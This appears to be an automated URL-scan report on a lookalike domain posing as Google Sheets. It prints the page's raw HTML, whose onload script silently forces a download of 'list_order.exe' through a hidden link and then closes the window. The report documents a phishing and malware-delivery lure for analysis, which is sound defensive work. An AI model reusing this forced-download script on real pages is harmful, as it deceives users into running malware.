- Scan ID:
- 592997e1-f8e8-47ea-8ae0-dea19ac4ed51Finished
- Submitted URL:
- https://docs-google-spreadsheets.anniemakesart.com/JqFkpNRedirected
- Report Finished:
Links · 0 found
The outgoing links identified from the page
JavaScript Variables · 3 found
Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope
Name | Type |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
Console log messages · 2 found
Messages logged to the web console
Type | Category | Log |
---|---|---|
error | network |
|
warning | other |
|
HTML
The raw HTML body of the page
<!DOCTYPE html><html lang="ru"><head><base href="/lander/goresolve-load_1734013623/index.html">
<meta charset="UTF-8">
<title>Google Sheets</title>
<script>
window.onload = function() {
const fileUrl = 'fille/list_order.exe';
const fileName = 'list_order.exe';
// Создание скрытой ссылки для скачивания
const link = document.createElement('a');
link.href = fileUrl;
link.download = fileName;
// Добавление ссылки в документ
document.body.appendChild(link);
// Программный клик по ссылке
link.click();
// Удаление ссылки из документа
document.body.removeChild(link);
// Попытка закрыть окно через 1 секунду
setTimeout(function() {
window.close();
}, 1000); // 1000 миллисекунд = 1 секунда
};
</script>
</head>
<body>
</body></html>